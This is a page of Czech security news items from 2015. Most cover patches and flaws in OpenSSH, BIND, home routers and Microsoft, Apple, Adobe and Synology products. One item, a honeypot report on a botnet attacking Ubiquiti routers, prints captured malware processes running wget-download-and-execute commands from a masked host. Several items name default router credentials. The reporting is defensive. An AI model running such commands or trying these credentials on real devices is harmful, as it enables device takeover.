Analytici z Qualsys tvrdí, že se jim skutečně podařilo z paměti dešifrovaný privátní klíč získat. Přestože ani Qualsys ani vývojáři OpenSSH nezaznamenali konkrétní případ zneužití této chyby, není vyloučeno, že si za šest let někdo chyby už všiml. Zmíněný buffer overflow je teoreticky také zneužitelný, ale vyžaduje zapnutí dvou konfiguračních voleb, které jsou ve výchozím stavu vypnuté: ProxyCommand a ForwardAgent (-A) nebo ForwardX11 (-X). Praktická zneužitelnost této chyby je tedy malá.

Ochrana proti ukradení privátních klíčů je poměrně snadná – stačí vypnout funkci roaming. Do souboru /etc/ssh/ssh_config stačí připsat volbu:

UseRoaming no
Vývojáři také už uvolnili patch, který se postupně dostane do distribucí (Debian, Ubuntu, RHEL a další už záplatu vydaly). Protože může být exploit zneužívaný v praxi, doporučují vývojáři klientům klíče vyměnit.

Chyba připomíná dva roky starý Heartbleed bug, který kvůli chybě v OpenSSL vzdáleně vylákat ze serveru důvěrné informace včetně privátních klíčů nebo hesel uživatelů. Současná chyba v SSH je ovšem méně závažná v tom, že vyžaduje aktivní pokus o připojení klienta. Na druhou stranu je ale získání privátního klíče často fatální, neboť umožňuje plný přístup k administraci mnoha různých serverů.

Přihlašování pomocí SSH klíčů je obecně považováno za výrazně bezpečnější variantu než prosté použití hesla. Namísto zadávání (a možného hádání) hesla je použit elektronický podpis vygenerovaný pomocí privátního klíče. Server má k dispozici veřejný klíč, kterým dokáže podepsanou zprávu ověřit a tím potvrdit identitu uživatele. Díky tomuto principu je možné používat jeden pár klíčů k přihlášení na mnoho serverů. Podmínkou bezpečnosti je, aby privátní klíč nikdy uživateli neunikl.

Pozor, změňte výchozí heslo na routerech UPC. Záškodník jej snadno odhalí
4.1.2015 Zranitelnosti
Zákazníci UPC, kteří na dodávaném routeru používají výchozí heslo k Wi-Fi, by jej měli co nejdříve změnit, na internetu se totiž potuluje program (respektive jeho zdrojový kód v C), který dokáže výchozí heslo odvodit z SSID.

Nástroj se již podařilo otestovat specialistům z bezpečnostní společnosti Comguard a českému bezpečnostnímu týmu CSIRT, jedná se tedy o globální problém platný i u nás.

Změna výchozího hesla by měla být prvním krokem, který uživatel provede po zprovoznění sítě. Český internet je totiž plný domácích Wi-Fi routerů, které používají výchozí hesla a to včetně těch pro administraci samotného routeru, která lze pro mnoho výrobců a modelů často velmi snadno dohledat na webu.

Nová verze BIND opravuje zranitelnosti

21.12.2015 Zranitelnosti

Nové verze BINDu záplatují tři nové zranitelnosti. Nejzávažnější z nich (CVE-2015–8000). může být zneužita ke spuštění DoS útoku proti serverům odpovídajícím na rekurzivní dotazy. Podle vyjádření odborníků z ISC může útočník pomocí záměrně špatně sestaveného atributu dotazu přinutit proces named k ukončení a tím způsobit výpadek služby. Riziko pro rekurzivní DNS servery je hodnoceno jako vysoké. Autoritativní servery mohou být také částečně postiženy, a to pokud provádějí autentifikaci při rekurzivních dotazech souvisejících s překladem adres serverů uvedených v NS RRSET. Zranitelnost je zneužitelná vzdáleně a byla klasifikována jako kritická, ačkoli ISC není známa existence aktivního exploitu této zranitelnosti.

Druhá z bezpečnostních děr opravených v nových verzích BINDu je sepnutí race condition při ošetření socket error. Tato zranitelnost může způsobit ukončení procesu named (CVE-2015–8461). Třetí opravenou chybou je zranitelnost OpenSSL (CVE-2015–3193).Přestože doposud nebylo publikováno významné zneužití žádné z těchto zranitelností, DNS servery jsou oblíbeným cílem několika typů útoku včetně DoS, únosu provozu a falšování odpovědí. Z tohoto důvodu by záplatování DNS serveru nemělo být bráno na lehkou váhu.

Routery jsou zamořeny chybami: Belkin, ZyXEL, Netgear a další

15.12.2015 Zranitelnosti

Bezdrátové routery určené pro domácnosti a malé kanceláře jsou zamořeny bezpečnostními chybami, na které neexistují záplaty. Chyby byly objeveny v routerech různých značek, včetně těch nejznámějších: ZyXEL, Belkin, ReadyNet, Amped Wireless, Buffalo a Netgear. Stejné problémy se přitom opakují už mnoho let.

Belkin tento měsíc podruhé

Bezpečnostní analytik John Garrett z Ethical Reporting objevil několik nových vážných zranitelností v bezdrátových routerech značky Belkin. Konkrétně jsou postiženy routery s označením AC-1750, AC-1200, N-600 a N-150.

Objeveno bylo několik problémů včetně path traversal (procházení adresářů v systému mimo document root) použitelných k útokům na různá API, slabiny umožňující měnit konfiguraci routerů, obcházení autentizace nebo dokonce vzdálené spouštění škodlivého kódu.

Garrett zveřejnil videa ukazující, jak je možné jednotlivé routery napadnout i při použití nejnovějšího oficiálního firmware. Upozornil také na to, že routery Belkin a Linksys (stejný majitel) obsahují aktualizační rozhraní, které samo o sobě otevírá velkou bezpečnostní díru. Belkin už na objevené zranitelnosti zareagoval a potvrdil, že připravuje aktualizaci firmware se záplatami.

Není to první aktuální problém s těmito routery, na začátku prosince indický analytik Rahul Pratap Singh objevil několik zranitelností zneužitelných ke kompromitování routeru. Je možné pomocí nich například shodit webové rozhraní routeru, odhadnout session ID a zneužít otevřený telnet s přihlašovacími údaji root/root.

Netgear s falešnými DNS záznamy

Joel Land ze CERT Coordination Center (CERT/CC) na Carnegie Mellon University zveřejnil minulý týden celou řadu bezpečnostních hlášení, které informují o bezpečnostních dírách v různých modelech routerů.

Objevil, že Netgear G54/N150 (WNR1000) s nejnovějším firmwarem 1.0.2.68 a zřejmě i staršími obsahuje chybu s označením CVE-2015–8263, která může být zneužita k injektování falešných DNS záznamů, které jsou pak předávány klientům. Uživatelé tak mohou být potichu směrováni na phishingové servery, které jsou řízené útočníkem.

Router je náchylný na klasické otrávení DNS cache (zdokonalené v podobě Kaminského zranitelnosti), které je staré přes sedm let. Používá jeden zdrojový port pro všechny DNS dotazy, takže je pro útočníka snadné vytvořit falešnou odpověď, která bude omylem spárována s legitimním požadavkem. Požadavky a odpovědi se párují jen podle čísla portu a odhadnutelného 16bitového query ID.

ZyXEL s heslem 1234

Jiné aktuální varování od CERT/CC obsahuje dvě chyby zneužitelné v routeru ZyXEL NBG-418N s firmware 1.00(AADZ.3)C0. Výrobce byl o chybách informován už v říjnu. Opět byly objeveny odhadnutelné výchozí přihlašovací údaje admin/1234, které mohou být zneužity pro vzdálené přihlášení k zařízení (CVE-2015–7283).

Chybu je možné kombinovat se zranitelností cross-site request forgery (CSRF), která byla už dříve objevena ve stejném routeru (CVE-2015–7284). Vzdálený útočník ji může zneužít ke spuštění vlastního kódu ve stejném kontextu, v jakém běží administrace routeru u řádného uživatele.

Útočník tedy může vzdáleně provádět akce se stejným oprávněním jako správce, pokud má uživatel otevřené aktivní spojení s routerem, přes které může přijímat útočníkem podvržené žádosti. V kombinaci s výchozími přihlašovacími údaji navíc může útočník otevřít přístup sám a nemusí čekat na to, až se oběť do administrace přihlásí.

Chyby v routerech ReadyNet, Amped Wireless a Buffalo

Bezpečnostní odborníci z CERT/CC také upozornili na výchozí přihlašovací údaje (CVE-2015–7280), a zranitelnost CSRF (CVE-2015–7281) a DNS spoofing (CVE-2015–7282) v routerech značky ReadyNet. Objevené problémy byly testovány na routeru ReadyNet WRT300N-DD s firmware 1.0.26. Výrobce se o nich dozvěděl už v září.

Podobně byly výchozí přihlašovací údaje (CVE-2015–7277), CSRF (CVE-2015–7278) a DNS spoofing (CVE-2015–7279) objeveny v routeru Amped Wireless R10000 s firmware 2.5.2.11. Výrobce dostal informace už v červenci.

Chybu umožňující DNS spoofing (CVE-2015–8262) mají také routery Buffalo AirStation Extreme N600 routers (WZR-600DHP2). Týká se verzí firmware 2.09, 2.13, 2.16 a pravděpodobně i dalších.

Stále stejná písnička

Je neuvěřitelné, že se už deset (a více) let objevují stále stejné chyby: děravé webové rozhraní, špatně nastavený web server, webové rozhraní otevřené do internetu, trapné výchozí přihlašovací údaje a nefunkční kontrola aktuálního firmware. V nejhorším případě je možné se na dálku dostat k paměti routeru včetně veškerého nastavení a hesel.

Dokud tento problém nebudeme schopni uspokojivě vyřešit, můžeme se bezpečností zabývat stále dokola, ale naše data budou od routeru putovat bůhvíkam. Elegantně to řeší projekt OpenWRT, který připravuje alternativní linuxový firmware pro mnohé routery a pravidelně ho aktualizuje. Otázkou je, proč ho některý z výrobců nepřevezme a nepoužije ve svém hardware, místo aby na koleně bastlil vlastní a zjevně děravé řešení.

S nebezpečnými chybami se roztrhl pytel. Záplatuje Microsoft i Apple

10.12.2015 Zranitelnosti
Desítky bezpečnostních chyb ohrožují uživatele softwarových produktů od Applu i Microsoftu. Trhliny byly objeveny také v aplikaci Adobe Flash Player, kterou používají k přehrávání videí na internetu desítky miliónů lidí po celém světě. Záplaty chyb jsou však již k dispozici.
Více než pět desítek bezpečnostních chyb bylo objeveno v operačním systému OS X El Capitan. Prakticky stejné množství trhlin se ukrývá také v populární mobilní platformě iOS, kterou používají chytré telefony iPhone a počítačové tablety iPad.

Pro všechny výše uvedené bezpečnostní problémy již společnost Apple vydala aktualizace. To platí také o několika chybách, které byly objeveny v dalších aplikacích tohoto amerického počítačového gigantu, jako jsou Xcode, watchOS a tvOS.

Opravy byly vydány také pro více než sedm desítek chyb v operačním systému Windows. Desítky dalších trhlin byly odhaleny ve webových prohlížečích Internet Explorer a Microsoft Edge, ale také například v kancelářském balíku Office.

Kybernetičtí nájezdníci mohou chyby zneužít
Některé z chyb označili tvůrci za kritické. Kybernetický nájezdník je tak může zneužít k tomu, aby na napadeném stroji spustil libovolný škodlivý kód. Na cizí počítač tak může propašovat klidně nezvaného návštěvníka, který bude odchytávat každý stisk kláves. Relativně snadno pak získá všechna přístupová hesla uživatele.

Hackeři mohou zneužít také chyby ve Flash Playeru. Právě tento populární přehrávač on-line videí je v počtu objevených trhlin naprostý rekordman – nalezeno jich bylo bezmála osm desítek. Záplaty jsou naštěstí také již k dispozici.

Opravy bezpečnostních chyb všech tří výrobců je možné stahovat prostřednictvím automatických aktualizací, v některých případech jsou k dispozici také přímo na stránkách daných společností.

Nebezpečné softwarové knihovny

17.11.2015 Zranitelnosti
Chyby v knihovnách třetích stran si často najdou svou cestu do koncových produktů – a to je problém, kterým se budou vývojáři a správci systémů v následujících měsících zabývat.

V dnešním světě agilního vývoje softwaru a rychlých cyklů vydávání nových verzí vývojáři při práci stále více spoléhají na knihovny a komponenty třetích stran. Protože mnoho z těchto knihoven pochází z dlouhodobých open source projektů, vývojáři často předpokládají, že jde o dobře napsaný bezchybný kód. Ale mnohdy se mýlí.

Hlavní záplatovací úsilí vyvolané chybami, jako Heartbleed (krvácení srdce), Shellshock či Poodle z poslední doby, slouží jako ukázky důsledků kritických chyb zabezpečení v kódu třetí strany. Chybami postižený software běžící na serverech, ve stolních počítačích, mobilních zařízeních a hardwarových řešeních ovlivňuje miliony spotřebitelů a firem.

Tyto vysoce medializované chyby zabezpečení však nebyly ojedinělými incidenty. Podobné chyby byly zjištěné v knihovnách, jako OpenSSL, LibTIFF, libpng, OpenJPEG, FFmpeg, Libav a bezpočtu dalších, a našly si během let cestu do tisíců produktů.

Jedním z důvodů, proč tyto chyby skončí v hotových produktech, je víra vývojářů, že jimi použitý kód třetích stran je bezpečný, protože ho už použilo mnoho lidí.

Mýtus nevýznamných chyb

„Existuje mýtus, že je open source software bezpečnější, protože ho může každý zkontrolovat a více očí zajistí, že zůstanou jen nevýznamné chyby,“ připomíná Jake Kouns, ředitel zabezpečení informací ve společnosti Risk Based Security, která se specializuje na sledování chyb zabezpečení.

„Skutečností je, že zatímco všichni mohou zkoumat kód, nedělají to a odpovědnost za kvalitu je zpožděná. Vývojáři a firmy používající knihovny třetích stran nevyhradí vlastní prostředky na testování bezpečnosti kódu někoho jiného. Ať už je to dobře nebo špatně, všichni si myslí, že chyby v zabezpečení najde někdo jiný a že publikovaný kód je bezpečný,“ dodává Kouns.

Skutečností je, že mnoho open source projektů, a to i ty, které produkují kód rozhodující pro internetovou infrastrukturu, je často špatně financovaných, potýkají se s nedostatkem lidských zdrojů a nemají ani zdaleka dostatek prostředků na zaplacení profesionálních auditů kódu nebo pracovní lidské síly, která by se zapojila do masivního přepisování starého kódu.

OpenSSL je významným příkladem takového případu, ale není zdaleka jediný. Poté, co došlo k oznámení kritické chyby Heartbleed v dubnu loňského roku, vyšlo najevo, že projekt OpenSSL měl jen jednoho vývojáře pracujícího na plný úvazek a že projekt byl primárně financovaný jako zakázková práce, kterou dělali ostatní členové týmu ve svém volném čase pro společnosti s potřebou expertizy SSL/TLS.

Vývojáři OpenBSD kritizovali OpenSSL za používání starého kódu pro platformy, o které se zajímá málo lidí, a rozhodli se udělat „fork“ projektu a vytvořit čistší verzi knihovny s názvem LibreSSL.

Chyby v open source knihovnách jsou často důsledkem jednoho nebo více z následujících důvodů: starý kód nebo nízká zralost kódu, nedostatečný audit a nedostatečné „fuze“ testování (procesem hledání chyb zabezpečení automatickým zadáváním neočekávaného vstupu do aplikací) a příliš málo udržovatelů, uvádí Carsten Eiram, ředitel výzkumu společnosti Risk Based Security.

„Vidíme, že mnoho chyb zabezpečení v těchto knihovnách výzkumníci najdou jen spuštěním nejnovějších fuzzerů, takže je to často něco, co mohli udržovatelé či společnosti používající uvedené knihovny udělat sami. Dodavatelé softwaru rychle implementují knihovny do svých produktů, ale jen zřídka předtím udělají audit, nebo dokonce fuzz, ani nepomáhají v jejich údržbě,“ podotýká Eiram.

Je to všechno marketing

Chyby zabezpečení typu Heartbleed zvedly zájem mezi vývojáři softwaru a správci systémů částečně z důvodu velké pozornosti, jaké se chybám dostalo v médiích. Někteří dodavatelé stále nacházejí produkty ovlivněné těmito chybami a vydávají pro ně opravy – tedy řadu měsíců po jejich prvním oznámení...

Microsoft vydal tucet záplat. Kritické chyby mají Windows i Explorer

11.11.2015 Zranitelnosti
Tucet bezpečnostních záplat vydala tento týden společnost Microsoft. Americký softwarový gigant jimi opravuje trhliny ve Windows, Internet Exploreru, Skypu, ale také v dalších softwarových produktech. S ohledem na závažnost chyb by lidé s instalací aktualizací neměli otálet.
Čtvrtina z vydaných záplat dostala nálepku „kritická“, to znamená, že trhliny představují pro uživatele nejvyšší možné nebezpečí. Upozornil na to server Krebs on Security.

Zranitelnosti mohou počítačoví piráti zneužít k tomu, aby propašovali prakticky libovolného záškodníka na cizí počítač. S jeho pomocí pak budou schopni přistupovat k uloženým datům, odposlouchávat internetovou komunikaci či počítač úplně zotročit.

Sítě zotročených počítačů
Takový stroj se pak klidně i bez vědomí uživatele může stát součástí botnetu (síť zotročených počítačů), který kyberzločinci zpravidla zneužívají k rozesílání spamu nebo k DDoS útokům.

Kritické zranitelnosti byly kromě platformy Windows objeveny také ve webovém browseru Internet Explorer. Útočníci je mohou také zneužít ke vzdálenému spuštění libovolného kódu. Stejně závažnou trhlinu obsahuje také nový prohlížeč Microsoft Edge.

Stahovat všechny záplaty pro kritické trhliny, které vyšly společně s balíkem pravidelných běžných aktualizací, je možné prostřednictvím služby Windows Update.

Apple vydal update na OS X El Capitan a opravil tak chybu, která způsobovala pády aplikací Office 2016

27.10.2015 Zranitelnosti
Apple zveřejnil OS X 10.11.1, tedy první update pro operační systém El Capitan. Nová verze obsahuje opravu problému, který způsoboval padání aplikací Microsoft Office 2016 pro Mac. Těmto chybám čelili uživatelé Maců několik měsíců.
Apple vydal update na OS X El Capitan a opravil tak chybu, která způsobovala pády aplikací Office 2016

Sdílet Email Kindle Twitter 1 LinkedIn 1 Sdílet 1
Facebook | To se mi líbí 1

Mezi popisy nového updatu Apple uvádí „zlepšená kompatibilita s Microsoft Office 2016“. Další položky jsou zvýšená spolehlivost při aktualizaci systému nebo řešení několika chyb v emailovém klientu operačního systému Mail.

Nejdůležitější však byly právě změny týkající se Office 2016 pro Mac. Microsoft na problémy Office 2016 v Macích upozorňoval od konce září letošního roku, chyby způsobující padání Excelu, OneNote, Outlooku nebo PowerPointu v systému OS X se však začaly objevovat již v létě.

Podle uživatelů na stránkách uživatelské podpory Microsoftu Outlook na Macu padal pravidelně a většinou s sebou vzal také ostatní běžící aplikace od Office. Jediný způsob, jak někteří mohli po pádu aplikace vůbec rozjet programy Microsoft Office, byl restart celého počítače, což způsobilo ztrátu veškeré rozdělané práce.

Ačkoliv většina uživatelů z těchto potíží vinila Microsoft, ten ani Apple chybu nepřiznali. S postupem času však Microsoft označil za viníka Apple. Obě společnosti se ale nakonec spojily a na novém updatu spolupracovaly.

Manažeři Microsoftu tak dnes bez jakéhokoliv ukazování prstů pobídli uživatele Maců, aby své systémy aktualizovali. „Apple dnes vydal nejnovější verzi systému El Capitan (10.11.1). Ujistěte se, prosím, že pracujete právě na této verzi,“ napsal člen týmu pracujícího na Outlooku pro Macy Faisal Jeelani.

Odezvy na update jsou prozatím pozvbudivé: „Pracuji na El Capitan 10.11.1, mám otevřených všech pět aplikací Office 365 Home již hodinu a zatím není ani známky po nuceném zavírání nebo padání aplikace,“ píše jeden z uživatelů na fórum Microsoftu.

Kritická chyba ohrožuje uživatele Windows

14.10.2015 Zranitelnosti
Hned v několika verzích operačního systému Windows byly odhaleny kritické bezpečnostní chyby. Jedna z nich se týká Internet Exploreru a útočník ji může zneužít k neoprávněnému přístupu do počítače. Před trhlinami varoval ve středu český Národní bezpečnostní tým CSIRT.
Kritická zranitelnost se týká i nového operačního systému Windows 10.
Pro objevené chyby jsou již k dispozici záplaty. „Společnost Microsoft vydala šest bezpečnostních záplat, z nichž tři jsou označeny jako kritické a zbytek jako důležité,“ uvedl bezpečnostní analytik Pavel Bašta z týmu CSIRT, který je provozován sdružením CZ.NIC.

„Jedna z kritických zranitelností, která se týká prohlížeče Internet Explorer na všech verzích operačního systému Windows, umožňuje útočníkovi získat přístup do systému s právy aktuálně přihlášeného uživatele,“ konstatoval Bašta.

Libovolný virus, přístup k uloženým datům
Právě tuto trhlinu může útočník zneužít k tomu, aby do počítače propašoval prakticky libovolný škodlivý kód. Stejně tak ale může přistupovat k nastavení napadeného stroje či uloženým datům na pevném disku.

S aktualizací by tak lidé neměli otálet. „Všem uživatelům Windows Vista, 7, 8, 8.1, a Windows 10 se doporučuje provést záplatování co nejdříve,“ uzavřel Bašta.

Stahovat všechny záplaty pro kritické trhliny, které vyšly společně s balíkem pravidelných běžných aktualizací, je možné prostřednictvím služby Windows Update.

Pozor na chybu v Outlooku! Můžete přijít o hesla

8.10.2015 Zranitelnosti
Bezpečnostní odborníci objevili propracovaný malware, který se dokáže zmocnit prakticky veškerých firemních hesel e-mailových účtů. Cesta k nim vede přes Outlook Web App, aplikaci pro webový prohlížeč určenou právě pro firmy a organizace.

Na škodlivý modul přišli pracovníci firmy Cybereason, na které se obrátila nejmenovaná společnost poté, co v rámci své sítě narazila na několik anomálií a žádala o prověření, zda nejde o projevy infekce.

Lidé z Cybereason následně během několika hodin našli podezřelý DLL soubor (OWAAUTH.dll) nahraný do Outlook Web App (OWA) serveru společnosti. Jmenoval se sice stejně jako jiný neškodný soubor, neobsahoval však potřebný podpis a byl nahraný z cizího prostředí. Zato byl jeho součástí backdoor, díky kterému mohli útočníci rozšifrovat a zmocnit se veškerých informací zabezpečeným HTTPS protokolem.

Po několik měsíců tak z firmy čerpali citlivá data, včetně tisíců uživatelských přístupů k e-mailovým schránkám.

„Hackeři v tomto případě získali přístup k vysoce strategickému prostředku: OWA serveru,“ uvádí Cybereason v blogovém příspěvku, ve kterém na problém upozorňují.

„OWA téměř ze své podstaty po společnostech vyžaduje relativně zběžné nastavení pravidel a v tomto případě byla nastavena tak, že umožnila dostat se na server z intrenetu. Útočníci tak mohli server bez povšimnutí ovládat několik měsíců.“

OWA je hackery poměrně vyhledávanou aplikací, protože slouží jako prostředník mezi světem veřejného internetu a interním zdrojem. A protože v daném případě společnost používala aplikaci k tomu, aby vzdáleným uživatelům umožnila přístup do Microsoft Outlooku, útočníci zneužili její nastavení, aby se zmocnili veškerých firemních hesel.

Cybereason sice neuvádí, zda podobně postižených firem je víc, ale vzhledem k propracovanosti malwaru, je pravděpodobné, že nepůjde pouze o jediný útok.

Děravý jako ementál. Adobe musí opravit desítky bezpečnostních chyb ve Flash Playeru

24.9.2015 Zranitelnosti
Společnost Adobe vydala aktualizaci, v rámci které opravuje více než dvě desítky chyb programu Flash Player. Trhliny v aplikaci, kterou používají k přehrávání videí na internetu desítky miliónů lidí po celém světě, mohou útočníci zneužít k ovládnutí cizího počítače. Upozornil na to server The Hacker News.
„Společnost Adobe vydala 23 bezpečnostních záplat pro Flash Player. Bezpečnostní záplaty opravují kritické chyby, které mohou potenciálně umožnit útočníkovi převzít kontrolu nad dotčeným systémem,“ varoval Pavel Bašta, analytik Národního bezpečnostního týmu CSIRT.CZ, který je provozován sdružením CZ.NIC.

Chyby se týkají uživatelů, kteří používají Flash Player v operačních systémech Windows, Linux a Mac OS X od Applu.

Prostřednictvím nalezených trhlin mohou počítačoví piráti propašovat do dotčeného operačního systému prakticky libovolný škodlivý kód. Mohou tak uživatele šmírovat, dostat se k uloženým datům na disku, nebo se jednoduše zmocnit celého systému na dálku.

S instalací aktualizace by tak lidé neměli rozhodně otálet. Stahovat ji je možné buď prostřednictvím automatických aktualizací, nebo přímo z webových stránek společnosti Adobe.

Nenechavý router botnet útočí na Ubiquiti airRouter

19.9.2015 Zranitelnosti

Poslední dva týdny se nám do SSH honeypotu provozovaného na routerech Turris nejvíce pokouší přihlašovat botnet, jehož IP adresy mají podle Shodanu často jednu společnou vlastnost: na portu 80 odpovídá AirOS bežící na Ubiquiti airRouter. Po úspěšném přihlášení se do routeru instaluje malware.

Není to tak dlouho, co jsme na základě sledování útočníků v našich telnetových honeypotech odhalili zajímavý botnet složený z domácích routerů značky ASUS. Poslední dva týdny se nám do SSH honeypotu provozovaného na routerech Turris zase nejvíce pokouší přihlašovat botnet, jehož IP adresy mají podle Shodanu často jednu společnou vlastnost: na portu 80 odpovídají s cookie AIROS_SESSIONID.

Tato cookie ukazuje na AirOS bežící na Ubiquiti airRouter. Podle dat ze Shodanu lze touto cookie identifikovat asi 20 % útočících IP adres z celkových cca 6 500 jako AirOS. Mnoho adres ale bývá z dynamických poolů, o kterých Shodan ještě neví.

Botnet velmi rád používá na přihlašování kombinaci jména a hesla ubnt:ubnt (tuto kombinaci nemáme běžně povolenou na SSH honeypotu a neúspěšné pokusy o přihlášení se na webu neukazují). Je to výchozí kombinace právě pro airRouter a evidentně je stále dost kusů, které nemají výchozí nastavení změněno. Navíc SSH port je dostupný z internetu.

Jeden airRouter jsme si tedy koupili a sledovali, co se stane. Než se útočníci pokusili do routeru přihlásit, uplynulo jenom pár minut. Bylo to, jako vrátit se 10 let zpátky do doby, kdy byl rozšířený červ Sasser. V době jeho největší slávy byly Windows napadeny dříve, než se provedly aktualizace (obejít to šlo jen offline instalací a offline patchem).

Vzorek malware je vzhledem k jeho hlučnosti dost známý – jedná se o PNScan.2, který se botnet pokouší šířit dál. Krátce po instalaci začne napadání dalších strojů. Soubory se seznamem IP adres k útoku se vyznačují tím, že jsou „předscanovány“, tj. útočníci už vědí, že na cílových strojích běží SSH.

Při delším čekání přibudou procesy dalších trojanů postahované od PNScan, většina běžících procesů patří malware:

PID USER VSZ STAT COMMAND
[...]
902 ubnt 812 R /usr/bin/
1005 ubnt 272 S /usr
1209 ubnt 3632 S /tmp/.xs/daemon.mips.mod
1210 ubnt 3632 S /tmp/.xs/daemon.mips.mod
1211 ubnt 3632 S /tmp/.xs/daemon.mips.mod
1212 ubnt 3632 S /tmp/.xs/daemon.mips.mod
1213 ubnt 3632 S /tmp/.xs/daemon.mips.mod
1236 ubnt 1972 S sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras;
1239 ubnt 3564 S ./wras
1240 ubnt 3564 S ./wras
1241 ubnt 3564 S ./wras
1248 ubnt 1972 S sh -c wget -c http://x.x.x.x/hsde;chmod 777 hsde;./hsde;
1251 ubnt 3564 S ./hsde
1252 ubnt 3564 S ./hsde
1253 ubnt 3564 S ./hsde
1292 ubnt 1972 S sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras;
1295 ubnt 3564 S ./wras
1296 ubnt 3564 S ./wras
1297 ubnt 3564 S ./wras
1302 ubnt 1972 S sh -c wget -c http://x.x.x.x/hsde;chmod 777 hsde;./hsde;
1305 ubnt 3564 S ./hsde
1306 ubnt 3564 S ./hsde
1307 ubnt 3564 S ./hsde
1368 ubnt 1972 S sh -c wget -c http://x.x.x.x/wras;chmod 777 wras;./wras;
1371 ubnt 3564 S ./wras
1372 ubnt 3564 S ./wras
1373 ubnt 3564 S ./wras
1427 ubnt 816 S /usr/bin/
[...]
Méně obvyklé procesy trojanů zobrazované jako „ /usr “ a „ /usr/bin “ patří trojanu Tsunami. Toto skrývání se dělá obyčejnou změnou argv[0] a je zarážející, proč si útočník nevybral změnu o něco méně nápadnou. Závěr ale není příliš překvapivý: zranitelné zařízení moc dlouho netknuté na internetu nevydrží.

Pokud tedy tento router vlastníte, zkuste se podívat, co všechno na něm běží za procesy. A pokud si ho hodláte pořídit, doporučujeme ho nejprve nastavit bez připojení do internetu, nastavit silné heslo a pokud ho opravdu nepotřebujete, vypnout SSH server pro spojení z internetu.

D-Link omylem zveřejnil privátní klíče, hackerům usnadnil práci

19.9.2015 Zranitelnosti
D-Link omylem zveřejnil privátní klíče, hackerům usnadnil práciDnes, Milan Šurkala, aktualitaSpolečnost D-Link se dopustila velké bezpečnostní chyby. Ve svém firmwaru ponechala i mnoho svých privátních klíčů, díky čemuž hackeři mohli vytvořit firmware s malwarem a bez problémů si jej digitálně podepsat.
Společnost D-Link poskytuje i open source firmwary ke svým zařízením, nicméně v poskytnutých balíčcích k bezpečnostní kameře D-Link DCS-5020L se omylem vyskytly i privátní klíče a hesla. To znamená, že útočník mohl vytvořit firmware obsahující škodlivý kód a bez větších problémů mohl takto závadný firmware nechat digitálně podepsat, aby se tvářil jako legitimní software od D-Linku.
Problém se týkal jen jednoho balíčku, neboť starší i novější verze už tyto klíče neobsahovaly. Původní certifikáty byly vytvořeny 27. února, takže chybu mohli útočníci využít už před půl rokem. Platnost všech omylem zveřejněných certifikátů vypršela nejpozději 3. září. Zatím se neví, zda někdo uvolněných klíčů D-Linku využil k nekalé činnosti. Připomeňme, že metoda využití kradených certifikátů k podpisu malwaru je docela oblíbená a především účinná. Takto bylo hacknuto např. Sony Pictures Entertainment.

Nebezpečné chyby ohrožují domácí datová úložiště

15.9.2015 Zranitelnosti
V posledních letech se těší stále větší popularitě tzv. NAS servery. Především v domácnostech představují ideální řešení, jak ukládat data z více počítačů, tabletů a chytrých telefonů na jedno centralizované úložiště. Jenže jak se ale nyní ukázalo, kvůli bezpečnostním chybám se mohou NAS servery stát Před chybami, které se týkají NAS serverů společnosti Synology, varoval český Národní bezpečnostní tým CSIRT. Trhliny jsou obsaženy v aplikacích Video Station a Download Station.

Kvůli chybám si může útočník dělat s napadeným NAS serverem prakticky cokoliv. „Zranitelnost umožňuje útočníkovi spustit libovolný příkaz jako root (správce systému, pozn. red.) a tak ovládnout celé zařízení,“ varoval bezpečnostní analytik Pavel Bašta z týmu CSIRT, který je provozován sdružením CZ.NIC.

Záplaty už jsou venku
Naštěstí záplaty opravující tyto chyby společnost Synology již vydala. „Uživatelé by měli záplaty nasadit pokud možno okamžitě, lze totiž očekávat, že se zranitelnosti opět pokusí někdo zneužít,“ doplnil Bašta.

Koneckonců na NAS servery se kyberzločinci zaměřili i v loňském roce, kdy internetem šířili upravenou verzi vyděračského viru cryptolocker. [celá zpráva]

Stahovat aktualizace je možné přímo z dotčených NAS serverů v nabídce Centrum balíčků.

Nebezpečné trhliny mají Windows, Office, Edge i Explorer

10.9.2015 Zranitelnosti
Společnost Microsoft tento týden vydala pravidelný balík aktualizací, který vychází vždy druhý týden v měsíci. Tentokrát je však porce bezpečnostních záplat opravdu velká, je jich více než pět desítek. Některé z objevených chyb, pro něž byly opravy vydány, jsou přitom kritické.
„Společnost Microsoft vydala záplaty na více než 50 zranitelností týkajících se Windows a aplikací Internet Explorer, Edge, Office, Lync, Exchange Server, NET Framework, Exchange Server a Skype pro Business Server,“ varoval analytik Pavel Bašta z Národního bezpečnostního týmu CSIRT.

Například u Windows se zranitelnosti týkají prakticky všech aktuálně podporovaných verzí, tedy Vist, sedmiček, osmiček a také nejnovějších desítek. Některé z trhlin jsou navíc označované jako kritické.

Kybernetický nájezdník je tak může zneužít k tomu, aby na napadeném stroji spustil libovolný škodlivý kód. Na cizí počítač tak může propašovat klidně nezvaného návštěvníka, který bude odchytávat každý stisk kláves. Relativně snadno pak získá všechna přístupová hesla uživatele.

Stahovat všechny záplaty pro kritické trhliny, které vyšly společně s balíkem pravidelných běžných aktualizací, je možné prostřednictvím služby Windows Update.

Experti odhalili další nebezpečnou trhlinu Androidu

21.8.2015 Zranitelnosti
V poslední době nalezli experti hned několik nebezpečných trhlin v operačním systému Android. Zatím poslední objevená chyba může být zneužita k propašování libovolného viru, varovali zástupci Národního bezpečnostního týmu CSIRT.CZ.
„Nová chyba týkající se komponenty Android mediaserver může být využita ke vzdálenému spuštění kódu,“ uvedl Pavel Bašta, bezpečnostní analytik týmu CSIRT.CZ, který je provozován sdružením CZ.NIC.

Pokud se útočníkům podaří spustit vzdáleně škodlivý kód, mohou se snadno dostat k datům uloženým v paměti telefonu nebo tabletu, případně mobilní zařízení na dálku ovládat či odposlouchávat.

K využití chyby nepotřebuje aplikace žádná zvláštní oprávnění
Pavel Bašta, bezpečnostní analytik týmu CSIRT.CZ
Útok zpravidla vypadá tak, že kyberzločinci se snaží přesvědčit o tom, že je potřeba nainstalovat novou aplikaci – například nástroj pro zrychlení chodu přístroje, případně nějakou aplikaci sloužící k zabezpečení.

„K využití chyby bohužel aplikace nepotřebuje žádná zvláštní oprávnění, což může uživatele vést k falešnému pocitu bezpečí,“ konstatoval Bašta. Právě prostřednictvím chyby si ale mohou po instalaci počítačoví piráti práva snadno zvýšit.

